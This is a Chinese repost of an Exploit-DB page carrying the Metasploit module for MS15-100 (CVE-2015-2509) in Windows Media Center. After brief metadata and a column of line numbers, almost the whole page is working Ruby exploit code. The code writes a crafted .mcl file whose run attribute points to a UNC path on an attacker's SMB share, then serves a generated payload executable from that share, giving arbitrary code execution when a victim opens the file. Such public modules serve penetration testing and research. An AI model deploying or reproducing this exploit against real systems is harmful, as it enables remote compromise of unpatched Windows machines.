Microsoft Windows Media Center – MCL (MS15-100) (Metasploit) - 体验盒子

作者： Metasploit

日期： 2015-09-15

类别：

remote

平台：

windows

来源：https://www.exploit-db.com/exploits/38195/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT

include Msf::Exploit::EXE

include Msf::Exploit::Remote::SMB::Server::Share

def initialize(info={})

super(update_info(info,

'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability",

'Description'=> %q{

This module exploits a vulnerability in Windows Media Center. By supplying

an UNC path in the *.mcl file, a remote file will be automatically downloaded,

which can result in arbitrary code execution.

},

'License'=> MSF_LICENSE,

'Author' =>

[

'sinn3r',

],

'References' =>

[

['CVE', '2015-2509'],

['MSB', 'MS15-100']

],

'Payload'=>

{

'DisableNops' => true

},

'DefaultOptions' =>

{

'DisablePayloadHandler' => 'false'

},

'Platform' => 'win',

'Targets'=>

[

['Windows', {}],

],

'Privileged' => false,

'DisclosureDate' => "Sep 8 2015",

'DefaultTarget'=> 0))

register_options(

[

OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),

OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])

], self.class)

deregister_options('FILE_CONTENTS')

end

def generate_mcl

%Q|<application run="#{unc}" />|

end

def primer

self.file_contents = generate_payload_exe

print_status("Malicious executable at #{unc}...")

print_status("Creating '#{datastore['FILENAME']}' file ...")

mcl = generate_mcl

file_create(mcl)

end